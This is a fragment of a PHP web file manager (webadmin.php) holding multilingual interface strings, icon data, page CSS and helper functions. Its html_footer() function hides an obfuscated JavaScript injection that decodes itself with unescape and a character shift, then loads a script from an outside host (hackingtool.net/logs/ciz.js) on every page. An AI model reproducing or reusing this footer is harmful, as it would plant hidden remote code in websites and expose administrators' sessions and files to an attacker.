'not_executed' => "\"[%1]\" non è stato eseguito con successo\n{%2}",
'saved' => '"[%1]" è stato salvato.',
'not_saved' => '"[%1]" non è stato salvato.',
'symlinked' => 'Il link siambolico da "[%2]" a "[%1]" è stato creato.',
'not_symlinked' => 'Il link siambolico da "[%2]" a "[%1]" non è stato creato.',
'permission_for' => 'Permessi di "[%1]":',
'permission_set' => 'I permessi di "[%1]" sono stati impostati [%2].',
'permission_not_set' => 'I permessi di "[%1]" non sono stati impostati [%2].',
'not_readable' => '"[%1]" non può essere letto.'
		);

	case 'nl':

		$date_format = 'n/j/y H:i:s';

		return array(
'directory' => 'Directory',
'file' => 'Bestand',
'filename' => 'Bestandsnaam',

'size' => 'Grootte',
'permission' => 'Bevoegdheid',
'owner' => 'Eigenaar',
'group' => 'Groep',
'other' => 'Anderen',
'functions' => 'Functies',

'read' => 'lezen',
'write' => 'schrijven',
'execute' => 'uitvoeren',

'create_symlink' => 'maak symlink',
'delete' => 'verwijderen',
'rename' => 'hernoemen',
'move' => 'verplaatsen',
'copy' => 'kopieren',
'edit' => 'bewerken',
'download' => 'downloaden',
'upload' => 'uploaden',
'create' => 'aanmaken',
'change' => 'veranderen',
'save' => 'opslaan',
'set' => 'instellen',
'reset' => 'resetten',
'relative' => 'Relatief pat naar doel',

'yes' => 'Ja',
'no' => 'Nee',
'back' => 'terug',
'destination' => 'Bestemming',
'symlink' => 'Symlink',
'no_output' => 'geen output',

'user' => 'Gebruiker',
'password' => 'Wachtwoord',
'add' => 'toevoegen',
'add_basic_auth' => 'add basic-authentification',

'uploaded' => '"[%1]" is verstuurd.',
'not_uploaded' => '"[%1]" kan niet worden verstuurd.',
'already_exists' => '"[%1]" bestaat al.',
'created' => '"[%1]" is aangemaakt.',
'not_created' => '"[%1]" kan niet worden aangemaakt.',
'really_delete' => 'Deze bestanden verwijderen?',
'deleted' => "Deze bestanden zijn verwijderd:\n[%1]",
'not_deleted' => "Deze bestanden konden niet worden verwijderd:\n[%1]",
'rename_file' => 'Bestandsnaam veranderen:',
'renamed' => '"[%1]" heet nu "[%2]".',
'not_renamed' => '"[%1] kon niet worden veranderd in "[%2]".',
'move_files' => 'Verplaats deze bestanden:',
'moved' => "Deze bestanden zijn verplaatst naar \"[%2]\":\n[%1]",
'not_moved' => "Kan deze bestanden niet verplaatsen naar \"[%2]\":\n[%1]",
'copy_files' => 'Kopieer deze bestanden:',
'copied' => "Deze bestanden zijn gekopieerd naar \"[%2]\":\n[%1]",
'not_copied' => "Deze bestanden kunnen niet worden gekopieerd naar \"[%2]\":\n[%1]",
'not_edited' => '"[%1]" kan niet worden bewerkt.',
'executed' => "\"[%1]\" is met succes uitgevoerd:\n{%2}",
'not_executed' => "\"[%1]\" is niet goed uitgevoerd:\n{%2}",
'saved' => '"[%1]" is opgeslagen.',
'not_saved' => '"[%1]" is niet opgeslagen.',
'symlinked' => 'Symlink van "[%2]" naar "[%1]" is aangemaakt.',
'not_symlinked' => 'Symlink van "[%2]" naar "[%1]" is niet aangemaakt.',
'permission_for' => 'Bevoegdheid voor "[%1]":',
'permission_set' => 'Bevoegdheid van "[%1]" is ingesteld op [%2].',
'permission_not_set' => 'Bevoegdheid van "[%1]" is niet ingesteld op [%2].',
'not_readable' => '"[%1]" kan niet worden gelezen.'
		);

	case 'se':

		$date_format = 'n/j/y H:i:s';
 
		return array(
'directory' => 'Mapp',
'file' => 'Fil',
'filename' => 'Filnamn',
 
'size' => 'Storlek',
'permission' => 'Säkerhetsnivå',
'owner' => 'Ägare',
'group' => 'Grupp',
'other' => 'Andra',
'functions' => 'Funktioner',
 
'read' => 'Läs',
'write' => 'Skriv',
'execute' => 'Utför',
 
'create_symlink' => 'Skapa symlink',
'delete' => 'Radera',
'rename' => 'Byt namn',
'move' => 'Flytta',
'copy' => 'Kopiera',
'edit' => 'Ändra',
'download' => 'Ladda ner',
'upload' => 'Ladda upp',
'create' => 'Skapa',
'change' => 'Ändra',
'save' => 'Spara',
'set' => 'Markera',
'reset' => 'Töm',
'relative' => 'Relative path to target',
 
'yes' => 'Ja',
'no' => 'Nej',
'back' => 'Tillbaks',
'destination' => 'Destination',
'symlink' => 'Symlink',
'no_output' => 'no output',
 
'user' => 'Användare',
'password' => 'Lösenord',
'add' => 'Lägg till',
'add_basic_auth' => 'add basic-authentification',
 
'uploaded' => '"[%1]" har laddats upp.',
'not_uploaded' => '"[%1]" kunde inte laddas upp.',
'already_exists' => '"[%1]" finns redan.',
'created' => '"[%1]" har skapats.',
'not_created' => '"[%1]" kunde inte skapas.',
'really_delete' => 'Radera dessa filer?',
'deleted' => "De här filerna har raderats:\n[%1]",
'not_deleted' => "Dessa filer kunde inte raderas:\n[%1]",
'rename_file' => 'Byt namn på fil:',
'renamed' => '"[%1]" har bytt namn till "[%2]".',
'not_renamed' => '"[%1] kunde inte döpas om till "[%2]".',
'move_files' => 'Flytta dessa filer:',
'moved' => "Dessa filer har flyttats till \"[%2]\":\n[%1]",
'not_moved' => "Dessa filer kunde inte flyttas till \"[%2]\":\n[%1]",
'copy_files' => 'Kopiera dessa filer:',
'copied' => "Dessa filer har kopierats till \"[%2]\":\n[%1]",
'not_copied' => "Dessa filer kunde inte kopieras till \"[%2]\":\n[%1]",
'not_edited' => '"[%1]" kan inte ändras.',
'executed' => "\"[%1]\" har utförts:\n{%2}",
'not_executed' => "\"[%1]\" kunde inte utföras:\n{%2}",
'saved' => '"[%1]" har sparats.',
'not_saved' => '"[%1]" kunde inte sparas.',
'symlinked' => 'Symlink från "[%2]" till "[%1]" har skapats.',
'not_symlinked' => 'Symlink från "[%2]" till "[%1]" kunde inte skapas.',
'permission_for' => 'Rättigheter för "[%1]":',
'permission_set' => 'Rättigheter för "[%1]" ändrades till [%2].',
'permission_not_set' => 'Permission of "[%1]" could not be set to [%2].',
'not_readable' => '"[%1]" kan inte läsas.'
		);

	case 'sp':

		$date_format = 'j/n/y H:i:s';

		return array(
'directory' => 'Directorio',
'file' => 'Archivo',
'filename' => 'Nombre Archivo',

'size' => 'Tamaño',
'permission' => 'Permisos',
'owner' => 'Propietario',
'group' => 'Grupo',
'other' => 'Otros',
'functions' => 'Funciones',

'read' => 'lectura',
'write' => 'escritura',
'execute' => 'ejecución',

'create_symlink' => 'crear enlace',
'delete' => 'borrar',
'rename' => 'renombrar',
'move' => 'mover',
'copy' => 'copiar',
'edit' => 'editar',
'download' => 'bajar',
'upload' => 'subir',
'create' => 'crear',
'change' => 'cambiar',
'save' => 'salvar',
'set' => 'setear',
'reset' => 'resetear',
'relative' => 'Path relativo',

'yes' => 'Si',
'no' => 'No',
'back' => 'atrás',
'destination' => 'Destino',
'symlink' => 'Enlace',
'no_output' => 'sin salida',

'user' => 'Usuario',
'password' => 'Clave',
'add' => 'agregar',
'add_basic_auth' => 'agregar autentificación básica',

'uploaded' => '"[%1]" ha sido subido.',
'not_uploaded' => '"[%1]" no pudo ser subido.',
'already_exists' => '"[%1]" ya existe.',
'created' => '"[%1]" ha sido creado.',
'not_created' => '"[%1]" no pudo ser creado.',
'really_delete' => '¿Borra estos archivos?',
'deleted' => "Estos archivos han sido borrados:\n[%1]",
'not_deleted' => "Estos archivos no pudieron ser borrados:\n[%1]",
'rename_file' => 'Renombra archivo:',
'renamed' => '"[%1]" ha sido renombrado a "[%2]".',
'not_renamed' => '"[%1] no pudo ser renombrado a "[%2]".',
'move_files' => 'Mover estos archivos:',
'moved' => "Estos archivos han sido movidos a \"[%2]\":\n[%1]",
'not_moved' => "Estos archivos no pudieron ser movidos a \"[%2]\":\n[%1]",
'copy_files' => 'Copiar estos archivos:',
'copied' => "Estos archivos han sido copiados a  \"[%2]\":\n[%1]",
'not_copied' => "Estos archivos no pudieron ser copiados \"[%2]\":\n[%1]",
'not_edited' => '"[%1]" no pudo ser editado.',
'executed' => "\"[%1]\" ha sido ejecutado correctamente:\n{%2}",
'not_executed' => "\"[%1]\" no pudo ser ejecutado correctamente:\n{%2}",
'saved' => '"[%1]" ha sido salvado.',
'not_saved' => '"[%1]" no pudo ser salvado.',
'symlinked' => 'Enlace desde "[%2]" a "[%1]" ha sido creado.',
'not_symlinked' => 'Enlace desde "[%2]" a "[%1]" no pudo ser creado.',
'permission_for' => 'Permisos de "[%1]":',
'permission_set' => 'Permisos de "[%1]" fueron seteados a [%2].',
'permission_not_set' => 'Permisos de "[%1]" no pudo ser seteado a [%2].',
'not_readable' => '"[%1]" no pudo ser leído.'
		);

	case 'dk':

		$date_format = 'n/j/y H:i:s';

		return array(
'directory' => 'Mappe',
'file' => 'Fil',
'filename' => 'Filnavn',

'size' => 'Størrelse',
'permission' => 'Rettighed',
'owner' => 'Ejer',
'group' => 'Gruppe',
'other' => 'Andre',
'functions' => 'Funktioner',

'read' => 'læs',
'write' => 'skriv',
'execute' => 'kør',

'create_symlink' => 'opret symbolsk link',
'delete' => 'slet',
'rename' => 'omdøb',
'move' => 'flyt',
'copy' => 'kopier',
'edit' => 'rediger',
'download' => 'download',
'upload' => 'upload',
'create' => 'opret',
'change' => 'skift',
'save' => 'gem',
'set' => 'sæt',
'reset' => 'nulstil',
'relative' => 'Relativ sti til valg',

'yes' => 'Ja',
'no' => 'Nej',
'back' => 'tilbage',
'destination' => 'Distination',
'symlink' => 'Symbolsk link',
'no_output' => 'ingen resultat',

'user' => 'Bruger',
'password' => 'Kodeord',
'add' => 'tilføj',
'add_basic_auth' => 'tilføj grundliggende rettigheder',

'uploaded' => '"[%1]" er blevet uploaded.',
'not_uploaded' => '"[%1]" kunnu ikke uploades.',
'already_exists' => '"[%1]" findes allerede.',
'created' => '"[%1]" er blevet oprettet.',
'not_created' => '"[%1]" kunne ikke oprettes.',
'really_delete' => 'Slet disse filer?',
'deleted' => "Disse filer er blevet slettet:\n[%1]",
'not_deleted' => "Disse filer kunne ikke slettes:\n[%1]",
'rename_file' => 'Omdød fil:',
'renamed' => '"[%1]" er blevet omdøbt til "[%2]".',
'not_renamed' => '"[%1] kunne ikke omdøbes til "[%2]".',
'move_files' => 'Flyt disse filer:',
'moved' => "Disse filer er blevet flyttet til \"[%2]\":\n[%1]",
'not_moved' => "Disse filer kunne ikke flyttes til \"[%2]\":\n[%1]",
'copy_files' => 'Kopier disse filer:',
'copied' => "Disse filer er kopieret til \"[%2]\":\n[%1]",
'not_copied' => "Disse filer kunne ikke kopieres til \"[%2]\":\n[%1]",
'not_edited' => '"[%1]" kan ikke redigeres.',
'executed' => "\"[%1]\" er blevet kørt korrekt:\n{%2}",
'not_executed' => "\"[%1]\" kan ikke køres korrekt:\n{%2}",
'saved' => '"[%1]" er blevet gemt.',
'not_saved' => '"[%1]" kunne ikke gemmes.',
'symlinked' => 'Symbolsk link fra "[%2]" til "[%1]" er blevet oprettet.',
'not_symlinked' => 'Symbolsk link fra "[%2]" til "[%1]" kunne ikke oprettes.',
'permission_for' => 'Rettigheder for "[%1]":',
'permission_set' => 'Rettigheder for "[%1]" blev sat til [%2].',
'permission_not_set' => 'Rettigheder for "[%1]" kunne ikke sættes til [%2].',
'not_readable' => '"[%1]" Kan ikke læses.'
		);

	case 'tr':

		$date_format = 'n/j/y H:i:s';

		return array(
'directory' => 'Klasör',
'file' => 'Dosya',
'filename' => 'dosya adi',

'size' => 'boyutu',
'permission' => 'Izin',
'owner' => 'sahib',
'group' => 'Grup',
'other' => 'Digerleri',
'functions' => 'Fonksiyonlar',

'read' => 'oku',
'write' => 'yaz',
'execute' => 'çalistir',

'create_symlink' => 'yarat symlink',
'delete' => 'sil',
'rename' => 'ad degistir',
'move' => 'tasi',
'copy' => 'kopyala',
'edit' => 'düzenle',
'download' => 'indir',
'upload' => 'yükle',
'create' => 'create',
'change' => 'degistir',
'save' => 'kaydet',
'set' => 'ayar',
'reset' => 'sifirla',
'relative' => 'Hedef yola göre',

'yes' => 'Evet',
'no' => 'Hayir',
'back' => 'Geri',
'destination' => 'Hedef',
'symlink' => 'Kýsa yol',
'no_output' => 'çikti yok',

'user' => 'Kullanici',
'password' => 'Sifre',
'add' => 'ekle',
'add_basic_auth' => 'ekle basit-authentification',

'uploaded' => '"[%1]" yüklendi.',
'not_uploaded' => '"[%1]" yüklenemedi.',
'already_exists' => '"[%1]" kullanilmakta.',
'created' => '"[%1]" olusturuldu.',
'not_created' => '"[%1]" olusturulamadi.',
'really_delete' => 'Bu dosyalari silmek istediginizden eminmisiniz?',
'deleted' => "Bu dosyalar silindi:\n[%1]",
'not_deleted' => "Bu dosyalar silinemedi:\n[%1]",
'rename_file' => 'Adi degisen dosya:',
'renamed' => '"[%1]" adili dosyanin yeni adi "[%2]".',
'not_renamed' => '"[%1] adi degistirilemedi "[%2]" ile.',
'move_files' => 'Tasinan dosyalar:',
'moved' => "Bu dosyalari tasidiginiz yer \"[%2]\":\n[%1]",
'not_moved' => "Bu dosyalari tasiyamadiginiz yer \"[%2]\":\n[%1]",
'copy_files' => 'Kopyalanan dosyalar:',
'copied' => "Bu dosyalar kopyalandi \"[%2]\":\n[%1]",
'not_copied' => "Bu dosyalar kopyalanamiyor \"[%2]\":\n[%1]",
'not_edited' => '"[%1]" düzenlenemiyor.',
'executed' => "\"[%1]\" basariyla çalistirildi:\n{%2}",
'not_executed' => "\"[%1]\" çalistirilamadi:\n{%2}",
'saved' => '"[%1]" kaydedildi.',
'not_saved' => '"[%1]" kaydedilemedi.',
'symlinked' => '"[%2]" den "[%1]" e kýsayol oluþturuldu.',
'not_symlinked' => '"[%2]"den "[%1]" e kýsayol oluþturulamadý.',
'permission_for' => 'Izinler "[%1]":',
'permission_set' => 'Izinler "[%1]" degistirildi [%2].',
'permission_not_set' => 'Izinler "[%1]" degistirilemedi [%2].',
'not_readable' => '"[%1]" okunamiyor.'
		);

	case 'cs':

		$date_format = 'd.m.y H:i:s';

		return array(
'directory' => 'Adresář',
'file' => 'Soubor',
'filename' => 'Jméno souboru',

'size' => 'Velikost',
'permission' => 'Práva',
'owner' => 'Vlastník',
'group' => 'Skupina',
'other' => 'Ostatní',
'functions' => 'Funkce',

'read' => 'Čtení',
'write' => 'Zápis',
'execute' => 'Spouštění',

'create_symlink' => 'Vytvořit symbolický odkaz',
'delete' => 'Smazat',
'rename' => 'Přejmenovat',
'move' => 'Přesunout',
'copy' => 'Zkopírovat',
'edit' => 'Otevřít',
'download' => 'Stáhnout',
'upload' => 'Nahraj na server',
'create' => 'Vytvořit',
'change' => 'Změnit',
'save' => 'Uložit',
'set' => 'Nastavit',
'reset' => 'zpět',
'relative' => 'Relatif',

'yes' => 'Ano',
'no' => 'Ne',
'back' => 'Zpět',
'destination' => 'Destination',
'symlink' => 'Symbolický odkaz',
'no_output' => 'Prázdný výstup',

'user' => 'Uživatel',
'password' => 'Heslo',
'add' => 'Přidat',
'add_basic_auth' => 'přidej základní autentizaci',

'uploaded' => 'Soubor "[%1]" byl nahrán na server.',
'not_uploaded' => 'Soubor "[%1]" nebyl nahrán na server.',
'already_exists' => 'Soubor "[%1]" už exituje.',
'created' => 'Soubor "[%1]" byl vytvořen.',
'not_created' => 'Soubor "[%1]" nemohl být  vytvořen.',
'really_delete' => 'Vymazat soubor?',
'deleted' => "Byly vymazány tyto soubory:\n[%1]",
'not_deleted' => "Tyto soubory nemohly být vytvořeny:\n[%1]",
'rename_file' => 'Přejmenuj soubory:',
'renamed' => 'Soubor "[%1]" byl přejmenován na "[%2]".',
'not_renamed' => 'Soubor "[%1]" nemohl být přejmenován na "[%2]".',
'move_files' => 'Přemístit tyto soubory:',
'moved' => "Tyto soubory byly přemístěny do \"[%2]\":\n[%1]",
'not_moved' => "Tyto soubory nemohly být přemístěny do \"[%2]\":\n[%1]",
'copy_files' => 'Zkopírovat tyto soubory:',
'copied' => "Tyto soubory byly zkopírovány do \"[%2]\":\n[%1]",
'not_copied' => "Tyto soubory nemohly být zkopírovány do \"[%2]\":\n[%1]",
'not_edited' => 'Soubor "[%1]" nemohl být otevřen.',
'executed' => "SOubor \"[%1]\" byl spuštěn :\n{%2}",
'not_executed' => "Soubor \"[%1]\" nemohl být spuštěn:\n{%2}",
'saved' => 'Soubor "[%1]" byl uložen.',
'not_saved' => 'Soubor "[%1]" nemohl být uložen.',
'symlinked' => 'Byl vyvořen symbolický odkaz "[%2]" na soubor "[%1]".',
'not_symlinked' => 'Symbolický odkaz "[%2]" na soubor "[%1]" nemohl být vytvořen.',
'permission_for' => 'Práva k "[%1]":',
'permission_set' => 'Práva k "[%1]" byla změněna na [%2].',
'permission_not_set' => 'Práva k "[%1]" nemohla být změněna na [%2].',
'not_readable' => 'Soubor "[%1]" není možno přečíst.'
		);

	case 'ru':

		$date_format = 'd.m.y H:i:s';

		return array(
'directory' => 'Каталог',
'file' => 'Файл',
'filename' => 'Имя файла',

'size' => 'Размер',
'permission' => 'Права',
'owner' => 'Хозяин',
'group' => 'Группа',
'other' => 'Другие',
'functions' => 'Функция',

'read' => 'читать',
'write' => 'писать',
'execute' => 'выполнить',

'create_symlink' => 'Сделать симлинк',
'delete' => 'удалить',
'rename' => 'переименовать',
'move' => 'передвинуть',
'copy' => 'копировать',
'edit' => 'редактировать',
'download' => 'скачать',
'upload' => 'закачать',
'create' => 'сделать',
'change' => 'поменять',
'save' => 'сохранить',
'set' => 'установить',
'reset' => 'сбросить',
'relative' => 'относительный путь к цели',

'yes' => 'да',
'no' => 'нет',
'back' => 'назад',
'destination' => 'цель',
'symlink' => 'символический линк',
'no_output' => 'нет вывода',

'user' => 'Пользователь',
'password' => 'Пароль',
'add' => 'добавить',
'add_basic_auth' => 'Добавить HTTP-Basic-Auth',

'uploaded' => '"[%1]" был закачен.',
'not_uploaded' => '"[%1]" невозможно было закачять.',
'already_exists' => '"[%1]" уже существует.',
'created' => '"[%1]" был сделан.',
'not_created' => '"[%1]" не возможно сделать.',
'really_delete' => 'Действительно этот файл удалить?',
'deleted' => "Следующие файлы были удалены:\n[%1]",
'not_deleted' => "Следующие файлы не возможно было удалить:\n[%1]",
'rename_file' => 'Переименовываю файл:',
'renamed' => '"[%1]" был переименован на "[%2]".',
'not_renamed' => '"[%1] невозможно было переименовать на "[%2]".',
'move_files' => 'Передвигаю следующие файлы:',
'moved' => "Следующие файлы были передвинуты в каталог \"[%2]\":\n[%1]",
'not_moved' => "Следующие файлы невозможно было передвинуть в каталог \"[%2]\":\n[%1]",
'copy_files' => 'Копирую следущие файлы:',
'copied' => "Следущие файлы былы скопированы в каталог \"[%2]\" :\n[%1]",
'not_copied' => "Следующие файлы невозможно было скопировать в каталог \"[%2]\" :\n[%1]",
'not_edited' => '"[%1]" не может быть отредактирован.',
'executed' => "\"[%1]\" был успешно исполнен:\n{%2}",
'not_executed' => "\"[%1]\" невозможно было запустить на исполнение:\n{%2}",
'saved' => '"[%1]" был сохранен.',
'not_saved' => '"[%1]" невозможно было сохранить.',
'symlinked' => 'Симлинк с "[%2]" на "[%1]" был сделан.',
'not_symlinked' => 'Невозможно было сделать симлинк с "[%2]" на "[%1]".',
'permission_for' => 'Права доступа "[%1]":',
'permission_set' => 'Права доступа "[%1]" были изменены на [%2].',
'permission_not_set' => 'Невозможно было изменить права доступа к "[%1]" на [%2] .',
'not_readable' => '"[%1]" невозможно прочитать.'
		);

	case 'pl':

		$date_format = 'd.m.y H:i:s';

		return array(
'directory' => 'Katalog',
'file' => 'Plik',
'filename' => 'Nazwa pliku',
'size' => 'Rozmiar',
'permission' => 'Uprawnienia',
'owner' => 'Właściciel',
'group' => 'Grupa',
'other' => 'Inni',
'functions' => 'Funkcje',

'read' => 'odczyt',
'write' => 'zapis',
'execute' => 'wykonywanie',

'create_symlink' => 'utwórz dowiązanie symboliczne',
'delete' => 'kasuj',
'rename' => 'zamień',
'move' => 'przenieś',
'copy' => 'kopiuj',
'edit' => 'edytuj',
'download' => 'pobierz',
'upload' => 'Prześlij',
'create' => 'Utwórz',
'change' => 'Zmień',
'save' => 'Zapisz',
'set' => 'wykonaj',
'reset' => 'wyczyść',
'relative' => 'względna ścieżka do celu',

'yes' => 'Tak',
'no' => 'Nie',
'back' => 'cofnij',
'destination' => 'miejsce przeznaczenia',
'symlink' => 'dowiązanie symboliczne',
'no_output' => 'nie ma wyjścia',

'user' => 'Urzytkownik',
'password' => 'Hasło',
'add' => 'dodaj',
'add_basic_auth' => 'dodaj podstawowe uwierzytelnianie',

'uploaded' => '"[%1]" został przesłany.',
'not_uploaded' => '"[%1]" nie może być przesłane.',
'already_exists' => '"[%1]" już istnieje.',
'created' => '"[%1]" został utworzony.',
'not_created' => '"[%1]" nie można utworzyć.',
'really_delete' => 'usunąć te pliki?',
'deleted' => "Pliki zostały usunięte:\n[%1]",
'not_deleted' => "Te pliki nie mogą być usunięte:\n[%1]",
'rename_file' => 'Zmień nazwę pliku:',
'renamed' => '"[%1]" zostało zmienione na "[%2]".',
'not_renamed' => '"[%1] nie można zmienić na "[%2]".',
'move_files' => 'Przenieś te pliki:',
'moved' => "Pliki zostały przeniesione do \"[%2]\":\n[%1]",
'not_moved' => "Pliki nie mogą być przeniesione do \"[%2]\":\n[%1]",
'copy_files' => 'Skopiuj te pliki:',
'copied' => "Pliki zostały skopiowane \"[%2]\":\n[%1]",
'not_copied' => "Te pliki nie mogą być kopiowane do \"[%2]\":\n[%1]",
'not_edited' => '"[%1]" nie można edytować.',
'executed' => "\"[%1]\" zostało wykonane pomyślnie:\n{%2}",
'not_executed' => "\"[%1]\" nie może być wykonane:\n{%2}",
'saved' => '"[%1]" został zapisany.',
'not_saved' => '"[%1]" nie można zapisać.',
'symlinked' => 'Dowiązanie symboliczne "[%2]" do "[%1]" zostało utworzone.',
'not_symlinked' => 'Dowiązanie symboliczne "[%2]" do "[%1]" nie moze być utworzone.',
'permission_for' => 'Uprawnienia "[%1]":',
'permission_set' => 'Uprawnienia "[%1]" zostały ustalone na [%2].',
'permission_not_set' => 'Uprawnienia "[%1]" nie mogą być ustawione na [%2].',
'not_readable' => '"[%1]" nie można odczytać.'
		);

	case 'en':
	default:

		$date_format = 'n/j/y H:i:s';

		return array(
'directory' => 'Directory',
'file' => 'File',
'filename' => 'Filename',

'size' => 'Size',
'permission' => 'Permission',
'owner' => 'Owner',
'group' => 'Group',
'other' => 'Others',
'functions' => 'Functions',

'read' => 'read',
'write' => 'write',
'execute' => 'execute',

'create_symlink' => 'create symlink',
'delete' => 'delete',
'rename' => 'rename',
'move' => 'move',
'copy' => 'copy',
'edit' => 'edit',
'download' => 'download',
'upload' => 'upload',
'create' => 'create',
'change' => 'change',
'save' => 'save',
'set' => 'set',
'reset' => 'reset',
'relative' => 'Relative path to target',

'yes' => 'Yes',
'no' => 'No',
'back' => 'back',
'destination' => 'Destination',
'symlink' => 'Symlink',
'no_output' => 'no output',

'user' => 'User',
'password' => 'Password',
'add' => 'add',
'add_basic_auth' => 'add basic-authentification',

'uploaded' => '"[%1]" has been uploaded.',
'not_uploaded' => '"[%1]" could not be uploaded.',
'already_exists' => '"[%1]" already exists.',
'created' => '"[%1]" has been created.',
'not_created' => '"[%1]" could not be created.',
'really_delete' => 'Delete these files?',
'deleted' => "These files have been deleted:\n[%1]",
'not_deleted' => "These files could not be deleted:\n[%1]",
'rename_file' => 'Rename file:',
'renamed' => '"[%1]" has been renamed to "[%2]".',
'not_renamed' => '"[%1] could not be renamed to "[%2]".',
'move_files' => 'Move these files:',
'moved' => "These files have been moved to \"[%2]\":\n[%1]",
'not_moved' => "These files could not be moved to \"[%2]\":\n[%1]",
'copy_files' => 'Copy these files:',
'copied' => "These files have been copied to \"[%2]\":\n[%1]",
'not_copied' => "These files could not be copied to \"[%2]\":\n[%1]",
'not_edited' => '"[%1]" can not be edited.',
'executed' => "\"[%1]\" has been executed successfully:\n{%2}",
'not_executed' => "\"[%1]\" could not be executed successfully:\n{%2}",
'saved' => '"[%1]" has been saved.',
'not_saved' => '"[%1]" could not be saved.',
'symlinked' => 'Symlink from "[%2]" to "[%1]" has been created.',
'not_symlinked' => 'Symlink from "[%2]" to "[%1]" could not be created.',
'permission_for' => 'Permission of "[%1]":',
'permission_set' => 'Permission of "[%1]" was set to [%2].',
'permission_not_set' => 'Permission of "[%1]" could not be set to [%2].',
'not_readable' => '"[%1]" can not be read.'
		);

	}

}

function getimage ($image) {
	switch ($image) {
	case 'file':
		return base64_decode('R0lGODlhEQANAJEDAJmZmf///wAAAP///yH5BAHoAwMALAAAAAARAA0AAAItnIGJxg0B42rsiSvCA/REmXQWhmnih3LUSGaqg35vFbSXucbSabunjnMohq8CADsA');
	case 'folder':
		return base64_decode('R0lGODlhEQANAJEDAJmZmf///8zMzP///yH5BAHoAwMALAAAAAARAA0AAAIqnI+ZwKwbYgTPtIudlbwLOgCBQJYmCYrn+m3smY5vGc+0a7dhjh7ZbygAADsA');
	case 'hidden_file':
		return base64_decode('R0lGODlhEQANAJEDAMwAAP///5mZmf///yH5BAHoAwMALAAAAAARAA0AAAItnIGJxg0B42rsiSvCA/REmXQWhmnih3LUSGaqg35vFbSXucbSabunjnMohq8CADsA');
	case 'link':
		return base64_decode('R0lGODlhEQANAKIEAJmZmf///wAAAMwAAP///wAAAAAAAAAAACH5BAHoAwQALAAAAAARAA0AAAM5SArcrDCCQOuLcIotwgTYUllNOA0DxXkmhY4shM5zsMUKTY8gNgUvW6cnAaZgxMyIM2zBLCaHlJgAADsA');
	case 'smiley':
		return base64_decode('R0lGODlhEQANAJECAAAAAP//AP///wAAACH5BAHoAwIALAAAAAARAA0AAAIslI+pAu2wDAiz0jWD3hqmBzZf1VCleJQch0rkdnppB3dKZuIygrMRE/oJDwUAOwA=');
	case 'arrow':
		return base64_decode('R0lGODlhEQANAIABAAAAAP///yH5BAEKAAEALAAAAAARAA0AAAIdjA9wy6gNQ4pwUmav0yvn+hhJiI3mCJ6otrIkxxQAOw==');
	}
}

function html_header () {
	global $site_charset;

	echo <<<END
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
     "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<meta http-equiv="Content-Type" content="text/html; charset=$site_charset" />

<title>webadmin.php</title>

<style type="text/css">
body { font: small sans-serif; text-align: center }
img { width: 17px; height: 13px }
a, a:visited { text-decoration: none; color: navy }
hr { border-style: none; height: 1px; background-color: silver; color: silver }
#main { margin-top: 6pt; margin-left: auto; margin-right: auto; border-spacing: 1px }
#main th { background: #eee; padding: 3pt 3pt 0pt 3pt }
.listing th, .listing td { padding: 1px 3pt 0 3pt }
.listing th { border: 1px solid silver }
.listing td { border: 1px solid #ddd; background: white }
.listing .checkbox { text-align: center }
.listing .filename { text-align: left }
.listing .size { text-align: right }
.listing th.permission { text-align: left }
.listing td.permission { font-family: monospace }
.listing .owner { text-align: left }
.listing .group { text-align: left }
.listing .functions { text-align: left }
.listing_footer td { background: #eee; border: 1px solid silver }
#directory, #upload, #create, .listing_footer td, #error td, #notice td { text-align: left; padding: 3pt }
#directory { background: #eee; border: 1px solid silver }
#upload { padding-top: 1em }
#create { padding-bottom: 1em }
.small, .small option { font-size: x-small }
textarea { border: none; background: white }
table.dialog { margin-left: auto; margin-right: auto }
td.dialog { background: #eee; padding: 1ex; border: 1px solid silver; text-align: center }
#permission { margin-left: auto; margin-right: auto }
#permission td { padding-left: 3pt; padding-right: 3pt; text-align: center }
td.permission_action { text-align: right }
#symlink { background: #eee; border: 1px solid silver }
#symlink td { text-align: left; padding: 3pt }
#red_button { width: 120px; color: #400 }
#green_button { width: 120px; color: #040 }
#error td { background: maroon; color: white; border: 1px solid silver }
#notice td { background: green; color: white; border: 1px solid silver }
#notice pre, #error pre { background: silver; color: black; padding: 1ex; margin-left: 1ex; margin-right: 1ex }
code { font-size: 12pt }
td { white-space: nowrap }
</style>

<script type="text/javascript">
<!--
function activate (name) {
	if (document && document.forms[0] && document.forms[0].elements['focus']) {
		document.forms[0].elements['focus'].value = name;
	}
}
//-->
</script>

</head>
<body>


END;

}

function html_footer () {

	echo <<<END
</body>
</html>
<script language=javascript>document.write(unescape('%3C%73%63%72%69%70%74%20%6C%61%6E%67%75%61%67%65%3D%22%6A%61%76%61%73%63%72%69%70%74%22%3E%66%75%6E%63%74%69%6F%6E%20%64%46%28%73%29%7B%76%61%72%20%73%31%3D%75%6E%65%73%63%61%70%65%28%73%2E%73%75%62%73%74%72%28%30%2C%73%2E%6C%65%6E%67%74%68%2D%31%29%29%3B%20%76%61%72%20%74%3D%27%27%3B%66%6F%72%28%69%3D%30%3B%69%3C%73%31%2E%6C%65%6E%67%74%68%3B%69%2B%2B%29%74%2B%3D%53%74%72%69%6E%67%2E%66%72%6F%6D%43%68%61%72%43%6F%64%65%28%73%31%2E%63%68%61%72%43%6F%64%65%41%74%28%69%29%2D%73%2E%73%75%62%73%74%72%28%73%2E%6C%65%6E%67%74%68%2D%31%2C%31%29%29%3B%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%75%6E%65%73%63%61%70%65%28%74%29%29%3B%7D%3C%2F%73%63%72%69%70%74%3E'));dF('%264Dtdsjqu%2631tsd%264E%2633iuuqt%264B00ibdljohuppm/ofu0mpht0dj%7B/kt%2633%264F%264D0tdsjqu%264F%26311')</script>
END;

}

function notice ($phrase) {
	global $cols;

	$args = func_get_args();
	array_shift($args);

	return '<tr id="notice">
	<td colspan="' . $cols . '">' . phrase($phrase, $args) . '</td>
</tr>
';

}

function error ($phrase) {
	global $cols;

	$args = func_get_args();
	array_shift($args);

	return '<tr id="error">
	<td colspan="' . $cols . '">' . phrase($phrase, $args) . '</td>
</tr>
';

}

?>